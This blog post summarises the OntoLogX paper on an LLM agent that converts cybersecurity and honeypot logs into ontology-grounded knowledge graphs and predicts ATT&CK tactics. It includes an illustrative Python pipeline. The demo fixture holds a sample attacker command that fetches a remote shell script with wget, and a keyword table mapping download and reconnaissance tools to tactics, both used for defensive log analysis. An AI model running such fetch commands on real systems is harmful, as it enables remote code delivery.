
AI Agent OntoLogX Structures Cybersecurity Logs for Threat Intelligence

TLDR: OntoLogX is an autonomous AI agent that uses Large Language Models (LLMs) to convert raw cybersecurity logs into structured, ontology-grounded Knowledge Graphs (KGs). It incorporates Retrieval Augmented Generation (RAG) and iterative correction to ensure semantic and syntactic validity. The system groups KGs into sessions to predict MITRE ATT&CK tactics, linking low-level log data to higher-level adversarial objectives. Evaluated on benchmark and real-world honeypot data, OntoLogX significantly improves the extraction of actionable Cyber Threat Intelligence, demonstrating the value of code-oriented LLMs and ontology-grounded representations.

Cybersecurity threats are constantly evolving, becoming more sophisticated and harder to detect. Traditional defense systems often struggle to keep pace, creating a need for more proactive strategies. A key source of information for understanding these threats lies within system logs, which record attacker behaviors, exploited vulnerabilities, and malicious activities. However, these logs are typically unstructured, inconsistent, and fragmented, which makes extracting meaningful insights from them difficult.

This is where Cyber Threat Intelligence (CTI) comes in. CTI involves collecting, processing, and analyzing information about threat actors to enable faster and better-informed decisions in cybersecurity operations. Among the most valuable sources for CTI are logs from honeypots, which are systems designed to attract and record malicious interactions, providing a rich dataset of adversarial behavior.

To address the challenges of processing these complex logs, researchers have explored using Knowledge Graphs (KGs). KGs represent concepts, entities, and events, along with the relationships between them, in a way that is closer to human understanding. This structured representation facilitates semantic reasoning and integration with automated workflows.

Recent advancements in Large Language Models (LLMs) have shown remarkable potential in extracting structured information from natural language. However, applying LLMs effectively in specialized domains like cybersecurity, where precise terminology and contextual interpretation are crucial, remains a challenge. Existing approaches often require heavily pre-processed inputs or significant user interaction.

A new autonomous AI agent called OntoLogX has been introduced to tackle these issues. OntoLogX leverages LLMs to transform raw logs directly into ontology-grounded Knowledge Graphs without requiring human intervention. It integrates a lightweight, domain-specific log ontology with Retrieval Augmented Generation (RAG) and iterative correction steps. This ensures that the generated KGs are both syntactically correct and semantically valid.

Beyond just analyzing individual events, OntoLogX aggregates these KGs into sessions. It then uses an LLM to predict MITRE ATT&CK tactics, which are high-level adversarial objectives. This crucial step links low-level log evidence to broader attack strategies, providing a more comprehensive understanding of threat activities.

The methodology of OntoLogX involves several key steps. When a log event arrives, the system first retrieves semantically related KGs from a database to serve as examples for the LLM. The LLM then generates a candidate KG from the new log event, optional context, and the domain ontology. This candidate is validated against the ontology's constraints. If errors are found, the model is prompted to apply targeted corrections, and the validate-and-correct cycle repeats until a valid representation is achieved. Once validated, the KG is stored, and finally, KGs from the same log session are grouped to predict the associated MITRE ATT&CK tactics.
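To make the loop concrete, here is an added illustration in Python that is not code from the OntoLogX paper or project. Each LLM-driven step is replaced by a deterministic stand-in so it runs offline: token-overlap similarity stands in for semantic retrieval, a hand-written candidate KG with drifted class and relation names stands in for the LLM's output, a name-snapping heuristic stands in for the correction prompt, and a keyword table stands in for session-level tactic prediction. The ontology, the log lines, the session id and the tactic table are all constructed for the example.

```python
"""Added example, not code from the OntoLogX paper or project: a miniature
retrieve -> generate -> validate -> correct -> store -> session-tactic loop.
Every LLM call is replaced by a deterministic stand-in; the ontology is invented."""
import difflib
from dataclasses import dataclass, field

# Assumed toy log ontology: allowed node classes and (domain, range) per relation.
CLASSES = {"LogEvent", "IPAddress", "User", "Command"}
RELATIONS = {
    "hasSourceIP": ("LogEvent", "IPAddress"),
    "targetsUser": ("LogEvent", "User"),
    "executesCommand": ("LogEvent", "Command"),
}
# Assumed keyword table standing in for the LLM's session-level tactic prediction.
TACTIC_HINTS = {
    "login failed": "Credential Access",
    "whoami": "Discovery",
    "uname": "Discovery",
    "wget": "Command and Control",
    "curl": "Command and Control",
    "crontab": "Persistence",
}


@dataclass
class KG:
    session: str                                  # honeypot session id
    raw: str                                      # log line it was extracted from
    nodes: dict = field(default_factory=dict)     # node id -> ontology class
    triples: list = field(default_factory=list)   # (subject, relation, object)


def retrieve(db, raw, k=2):
    """RAG step: return the k stored KGs whose log text overlaps most (token Jaccard)."""
    toks = set(raw.lower().split())

    def score(kg):
        other = set(kg.raw.lower().split())
        return len(toks & other) / len(toks | other)

    return sorted(db, key=score, reverse=True)[:k]


def validate(kg):
    """Check a candidate KG against the ontology; return a list of structured errors."""
    errors = []
    for node, cls in kg.nodes.items():
        if cls not in CLASSES:
            errors.append(("class", node, cls))
    for s, rel, o in kg.triples:
        if rel not in RELATIONS:
            errors.append(("relation", rel))
        elif s not in kg.nodes or o not in kg.nodes:
            errors.append(("dangling", s, rel, o))
        elif (kg.nodes[s], kg.nodes[o]) != RELATIONS[rel]:
            errors.append(("domain_range", s, rel, o))
    return errors


def correct(kg, errors):
    """Stand-in for the targeted-correction prompt: snap misspelled class and
    relation names to the closest ontology term. Domain/range and dangling errors
    are deliberately left alone, so ingest() can also show a candidate that never
    converges and is rejected."""
    for err in errors:
        if err[0] == "class":
            _, node, cls = err
            kg.nodes[node] = difflib.get_close_matches(cls, CLASSES, n=1, cutoff=0)[0]
        elif err[0] == "relation":
            good = difflib.get_close_matches(err[1], RELATIONS, n=1, cutoff=0)[0]
            kg.triples = [(s, good if r == err[1] else r, o) for s, r, o in kg.triples]
    return kg


def ingest(db, candidate, max_rounds=3):
    """Validate, iteratively correct, and store; return None if never valid."""
    for _ in range(max_rounds + 1):
        errors = validate(candidate)
        if not errors:
            db.append(candidate)
            return candidate
        candidate = correct(candidate, errors)
    return None


def session_tactics(db, session):
    """Group stored KGs by session and map their content to ATT&CK tactics."""
    found = set()
    for kg in db:
        if kg.session != session:
            continue
        cmds = [n for n, c in kg.nodes.items() if c == "Command"]
        text = " ".join([kg.raw] + cmds).lower()
        found.update(t for kw, t in TACTIC_HINTS.items() if kw in text)
    return sorted(found)


def demo():
    """Run the pipeline over two constructed (not real) honeypot events from one session."""
    db = []
    ev1 = KG("s1", "2024-05-01T10:00:01 login failed user=root from 203.0.113.5",
             nodes={"e1": "LogEvent", "203.0.113.5": "IPAddress", "root": "User"},
             triples=[("e1", "hasSourceIP", "203.0.113.5"), ("e1", "targetsUser", "root")])
    ingest(db, ev1)
    # A drifted candidate of the kind an LLM emits: class and relation names off-ontology.
    cmd = "wget http://198.51.100.7/x.sh"
    ev2 = KG("s1", f"2024-05-01T10:00:09 cmd: {cmd} from 203.0.113.5",
             nodes={"e2": "LogEvent", "203.0.113.5": "IpAddr", cmd: "Command"},
             triples=[("e2", "hasSrcIP", "203.0.113.5"), ("e2", "execCommand", cmd)])
    examples = retrieve(db, ev2.raw)      # few-shot context the LLM would be given
    fixed = ingest(db, ev2)
    return {
        "examples": [kg.raw for kg in examples],
        "corrected": fixed.nodes["203.0.113.5"] if fixed else None,
        "tactics": session_tactics(db, "s1"),
    }
```

Calling `demo()` returns the stored event as the retrieved example, `"IPAddress"` as the corrected class for the IP node, and `["Command and Control", "Credential Access"]` as the session's tactics. The bounded loop in `ingest()` is the part worth copying: a candidate whose subject and object violate a relation's domain and range is rejected after `max_rounds` rather than being stored, which is the behaviour you want before anything downstream reasons over the graph.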

The evaluation of OntoLogX demonstrated its effectiveness in generating ontology-compliant KGs. The retrieval and correction mechanisms significantly improved the precision and recall of information extraction. Interestingly, code-oriented LLMs proved particularly well-suited for this structured log analysis task. The system was tested on both public benchmark logs and a real-world honeypot dataset, showing robust KG generation and accurate mapping of adversarial activity to ATT&CK tactics.

While OntoLogX represents a significant step forward in extracting actionable CTI from logs, the reliance on computationally intensive LLMs presents a scalability challenge for high-throughput environments. Future work aims to explore optimization strategies and extend the ontology to cover more log sources and CTI standards. For more details, you can refer to the full research paper: OntoLogX: Ontology-Guided Knowledge Graph Extraction from Cybersecurity Logs with Large Language Models.


Overall, OntoLogX offers a novel and promising approach to transforming unstructured and heterogeneous logs into valuable intelligence, enhancing proactive and explainable cyber defense.

Karthik Mehta, https://blogs.edgentiq.com

Karthik Mehta is a data journalist known for his data-rich, insightful coverage of AI news and developments. Armed with a degree in Data Science from IIT Bombay and years of newsroom experience, Karthik merges storytelling with metrics to surface deeper narratives in AI-related events. His writing cuts through hype, revealing the real-world impact of Generative AI on industries, policy, and society. You can reach him at: [email protected]
